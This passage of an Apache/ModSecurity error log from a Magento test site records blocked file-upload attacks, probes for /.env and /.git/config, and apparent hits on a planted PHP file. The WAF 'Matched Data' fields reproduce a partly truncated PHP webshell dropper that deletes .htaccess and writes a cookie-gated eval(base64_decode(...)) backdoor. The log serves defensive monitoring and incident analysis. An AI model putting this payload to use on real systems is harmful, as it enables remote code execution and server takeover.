"aT8eJ_riWl83-O5fNouomwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/i/6i88364f428d25.phar
[Sun Dec 14 21:29:27.369952 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aT8eJ_riWl83-O5fNouomwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/i/6i88364f428d25.phar
[Sun Dec 14 21:29:27.370123 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aT8eJ_riWl83-O5fNouomwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/i/6i88364f428d25.phar
[Sun Dec 14 21:29:28.137158 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Rule 7ff8018b6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/i/6i88364f428d25.php8"] [unique_id "aT8eKPriWl83-O5fNouonAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 21:29:28.137655 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/i/6i88364f428d25.php8"] [unique_id "aT8eKPriWl83-O5fNouonAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 21:29:28.140161 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/i/6i88364f428d25.php8"] [unique_id "aT8eKPriWl83-O5fNouonAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 21:29:28.140364 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/i/6i88364f428d25.php8"] [unique_id "aT8eKPriWl83-O5fNouonAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 15 14:48:42.818805 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Rule 7fc91b07abe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/3/e388364f428d25.phar"] [unique_id "aUARulKdHVfS9Ty022ZrqAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 15 14:48:42.819363 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/3/e388364f428d25.phar"] [unique_id "aUARulKdHVfS9Ty022ZrqAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 15 14:48:42.821868 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/3/e388364f428d25.phar"] [unique_id "aUARulKdHVfS9Ty022ZrqAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 15 14:48:42.822077 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/3/e388364f428d25.phar"] [unique_id "aUARulKdHVfS9Ty022ZrqAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 15 14:48:43.082658 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: e388364f428d25.php8 found within FILES:custom_attributes[country_id]: e388364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUARu1KdHVfS9Ty022ZrqQAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/3/e388364f428d25.phar
[Mon Dec 15 14:48:43.083458 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUARu1KdHVfS9Ty022ZrqQAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/3/e388364f428d25.phar
[Mon Dec 15 14:48:43.083737 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUARu1KdHVfS9Ty022ZrqQAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/3/e388364f428d25.phar
[Mon Dec 15 14:48:43.303555 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Rule 7fc91b07abe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/3/e388364f428d25.php8"] [unique_id "aUARu1KdHVfS9Ty022ZrqgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 15 14:48:43.304027 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/3/e388364f428d25.php8"] [unique_id "aUARu1KdHVfS9Ty022ZrqgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 15 14:48:43.306558 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/3/e388364f428d25.php8"] [unique_id "aUARu1KdHVfS9Ty022ZrqgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 15 14:48:43.306761 2025] [:error] [pid 755218] [client 91.84.106.190:55736] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/3/e388364f428d25.php8"] [unique_id "aUARu1KdHVfS9Ty022ZrqgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 16 05:43:31.260555 2025] [authz_core:error] [pid 769634] [client 206.189.19.19:55702] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 16 05:43:34.259673 2025] [:error] [pid 769692] [client 206.189.19.19:55740] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUDjdkVxACeM2CHokW_MZgAAAAc"]
[Tue Dec 16 05:43:34.260006 2025] [:error] [pid 769692] [client 206.189.19.19:55740] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUDjdkVxACeM2CHokW_MZgAAAAc"]
[Tue Dec 16 05:43:34.260216 2025] [:error] [pid 769692] [client 206.189.19.19:55740] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUDjdkVxACeM2CHokW_MZgAAAAc"]
[Tue Dec 16 05:43:35.260424 2025] [:error] [pid 769694] [client 206.189.19.19:55754] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUDjd7pMgFLwbYMxrhXwywAAAAk"]
[Tue Dec 16 05:43:35.260659 2025] [:error] [pid 769694] [client 206.189.19.19:55754] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUDjd7pMgFLwbYMxrhXwywAAAAk"]
[Tue Dec 16 05:43:35.260857 2025] [:error] [pid 769694] [client 206.189.19.19:55754] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUDjd7pMgFLwbYMxrhXwywAAAAk"]
[Tue Dec 16 05:43:37.261911 2025] [:error] [pid 769706] [client 206.189.19.19:55756] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUDjeT0mEQXjYhIVaHH4rgAAAAo"]
[Tue Dec 16 05:43:37.262153 2025] [:error] [pid 769706] [client 206.189.19.19:55756] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUDjeT0mEQXjYhIVaHH4rgAAAAo"]
[Tue Dec 16 05:43:37.262323 2025] [:error] [pid 769706] [client 206.189.19.19:55756] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUDjeT0mEQXjYhIVaHH4rgAAAAo"]
[Tue Dec 16 06:57:49.982414 2025] [authz_core:error] [pid 769364] [client 156.146.41.218:47875] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Tue Dec 16 06:57:50.799746 2025] [autoindex:error] [pid 772529] [client 146.70.170.222:43213] AH01276: Cannot serve directory /var/www/magento.test.indacotrentino.com/www/pub/errors/: No matching DirectoryIndex (index.php) found, and server-generated directory index forbidden by Options directive, referer: https://autumnus.test.indacotrentino.com/errors
[Tue Dec 16 06:57:51.692332 2025] [php:warn] [pid 772526] [client 93.156.199.55:54283] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Tue Dec 16 06:57:51.867274 2025] [autoindex:error] [pid 772637] [client 37.159.26.50:10448] AH01276: Cannot serve directory /var/www/magento.test.indacotrentino.com/www/pub/errors/: No matching DirectoryIndex (index.php) found, and server-generated directory index forbidden by Options directive, referer: https://autumnus.test.indacotrentino.com/errors
[Tue Dec 16 06:57:52.480718 2025] [authz_core:error] [pid 772686] [client 185.243.218.225:51906] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Tue Dec 16 06:57:53.092702 2025] [php:warn] [pid 769693] [client 46.246.122.71:2869] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Tue Dec 16 06:57:54.230132 2025] [authz_core:error] [pid 772695] [client 46.246.122.71:52531] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Tue Dec 16 06:57:54.235800 2025] [autoindex:error] [pid 772696] [client 159.223.242.210:49581] AH01276: Cannot serve directory /var/www/magento.test.indacotrentino.com/www/pub/errors/: No matching DirectoryIndex (index.php) found, and server-generated directory index forbidden by Options directive, referer: https://autumnus.test.indacotrentino.com/errors
[Tue Dec 16 06:57:54.679442 2025] [authz_core:error] [pid 772635] [client 2.57.170.110:19353] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Tue Dec 16 06:57:54.823220 2025] [authz_core:error] [pid 772696] [client 149.22.91.141:55555] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Tue Dec 16 06:57:55.328429 2025] [php:warn] [pid 772530] [client 93.71.103.137:59617] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Tue Dec 16 06:58:04.458689 2025] [authz_core:error] [pid 772526] [client 49.185.200.101:55997] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Tue Dec 16 06:59:13.027720 2025] [autoindex:error] [pid 772711] [client 146.70.170.222:39243] AH01276: Cannot serve directory /var/www/magento.test.indacotrentino.com/www/pub/errors/: No matching DirectoryIndex (index.php) found, and server-generated directory index forbidden by Options directive, referer: https://autumnus.test.indacotrentino.com/errors
[Tue Dec 16 06:59:32.953036 2025] [authz_core:error] [pid 772526] [client 185.243.218.230:54950] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Tue Dec 16 07:00:54.631427 2025] [authz_core:error] [pid 769367] [client 46.246.122.71:35924] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Tue Dec 16 07:00:55.743451 2025] [authz_core:error] [pid 772733] [client 46.246.122.71:53605] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Tue Dec 16 07:03:16.644041 2025] [php:warn] [pid 772735] [client 89.144.202.235:58914] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Tue Dec 16 07:20:16.053909 2025] [authz_core:error] [pid 772716] [client 156.146.41.218:34793] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Tue Dec 16 07:20:16.062322 2025] [authz_core:error] [pid 772763] [client 46.246.122.71:54766] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Tue Dec 16 07:20:16.132566 2025] [authz_core:error] [pid 772711] [client 146.70.170.222:45693] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Tue Dec 16 07:20:16.142069 2025] [authz_core:error] [pid 772704] [client 46.246.122.71:27230] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Tue Dec 16 07:20:16.440508 2025] [authz_core:error] [pid 769367] [client 185.17.107.85:41041] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Tue Dec 16 07:20:21.077546 2025] [php:warn] [pid 772733] [client 146.70.170.222:36053] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Tue Dec 16 07:20:22.094323 2025] [php:warn] [pid 772682] [client 156.146.41.218:44709] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Tue Dec 16 07:21:27.046296 2025] [authz_core:error] [pid 772704] [client 146.70.170.222:34945] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Tue Dec 16 07:22:26.712804 2025] [authz_core:error] [pid 769367] [client 46.246.122.71:28167] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Tue Dec 16 07:22:30.862474 2025] [authz_core:error] [pid 772682] [client 46.246.122.71:54523] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Tue Dec 16 08:17:21.292594 2025] [authz_core:error] [pid 772735] [client 128.199.182.152:34976] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 16 08:17:25.721802 2025] [:error] [pid 772688] [client 128.199.182.152:35814] [client 128.199.182.152] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUEHhbkrl1QSV07OkBzCbgAAAA0"]
[Tue Dec 16 08:17:25.722045 2025] [:error] [pid 772688] [client 128.199.182.152:35814] [client 128.199.182.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUEHhbkrl1QSV07OkBzCbgAAAA0"]
